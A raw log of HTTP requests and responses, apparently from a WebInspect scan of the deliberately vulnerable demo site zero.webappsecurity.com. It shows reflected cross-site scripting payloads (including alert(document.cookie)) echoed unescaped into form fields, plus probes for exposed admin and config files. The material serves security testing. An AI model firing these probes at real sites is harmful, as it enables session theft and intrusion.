SIZE=2> User Name: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="TEXT" NAME="account" VALUE="" SIZE=14></FONT><BR> <IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=1 HEIGHT=4><BR> <FONT FACE="VERDANA,ARIAL" SIZE=2> Password: <FONT FACE="VERDANA,ARIAL" SIZE=3><INPUT TYPE="PASSWORD" NAME="pwd" VALUE="" SIZE=12></FONT><BR> <FONT SIZE=2 FACE="VERDANA,ARIAL"><b> &nbsp;<BR> <INPUT TYPE="SUBMIT" NAME="change" VALUE="Login"> </TD> </TR> </TABLE> <INPUT TYPE="HIDDEN" NAME="cache" VALUE="681"> </FORM> <SCRIPT LANGUAGE="JavaScript"> <!-- var MC=document.cookie; var temp; if(MC){ var start=MC.indexOf("!!"); var end=MC.indexOf("!!",start+2); temp=MC.substring(start+2,end); if(temp.length > 1 && temp.length < 20){ document.form1.account.value=temp; } } // --> </SCRIPT> &nbsp;<BR> </TD> </TR> </TABLE> <IMG SRC="http://www.heardinthehive.com/adimages/bottom_blend.gif" WIDTH=585 HEIGHT=15><BR> </TD> <TD BGCOLOR="#33CC99"><IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR></TD> </TR> </TABLE> <IMG SRC="http://www.heardinthehive.com/adimages/account_footer.gif" WIDTH=625 HEIGHT=25><BR> <TABLE CELLPADDING=0 CELLSPACING=0 WIDTH=625 BORDER=0> <TR> <TD align=right> <font face=arial size=1>powered by <a href="http://www.adcycle.com">adcycle.com</a> v0.77b <IMG SRC="http://www.heardinthehive.com/adimages/clear.gif" WIDTH=20 HEIGHT=1><BR> </TD> </TR> </TABLE> </BODY> </HTML>
GET /forgot1.asp?get=333%2D333%2D3333test@test999.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/forgot.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:49 GMT X-Powered-By: ASP.NET Location: forgot2.asp?msg2=no&msg=We+could+not+find+your+e-mail+address+in+our+database.+Please+join+below. Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=>"><script>alert("XSS")</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:32 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /_private/document.URL; HTTP/1.0 Referer: http://zero.webappsecurity.com:80/_private/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:46 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
POST /rootlogin.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Content-Length: 127 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=333%2D333%2D3333test@test999.com
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:17 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 104 Content-Type: text/html Cache-control: private <html> <body> Invalid Data 333-333-3333test@test999.com<br>Please try again. </body> </html>
GET /admin/cgi.zip HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:43:37 GMT Content-Type: application/x-zip-compressed Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:46:59 GMT ETag: "7ac34bf7a9dc11:8f6" Content-Length: 82 <html> This should not show up. if so it is because it does not check right</html>
GET /_vti_bin/.FBCIndex HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:46:50 GMT WWW-Authenticate: Negotiate WWW-Authenticate: NTLM Content-Length: 4431 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>You are not authorized to view this page</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li> <li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page.</li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <li>Background:<br> This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource. <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li> </p> </ul> </font></td> </tr> </table> </body> </html>
GET /global.asa HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Server Error Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:30:15 GMT X-Powered-By: ASP.NET Content-Type: text/html Content-Length: 4231 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</id></h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Edit the page address in the Address bar to remove global.asa and press <strong>Enter</strong>.</li> <li>If a link brought you to this Web page, contact that Web site's administrator.</li> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the <script> Homepage();</script> home page.</li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP Error 500-15 - Requests for global.asa not allowed<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=500.15&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li> </ul> </font></td> </tr> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=test@<script>alert(document.cookie)</script>.com&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:43 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4022 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=test@<script>alert(document.cookie)</script>.com&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:37 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4022 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" 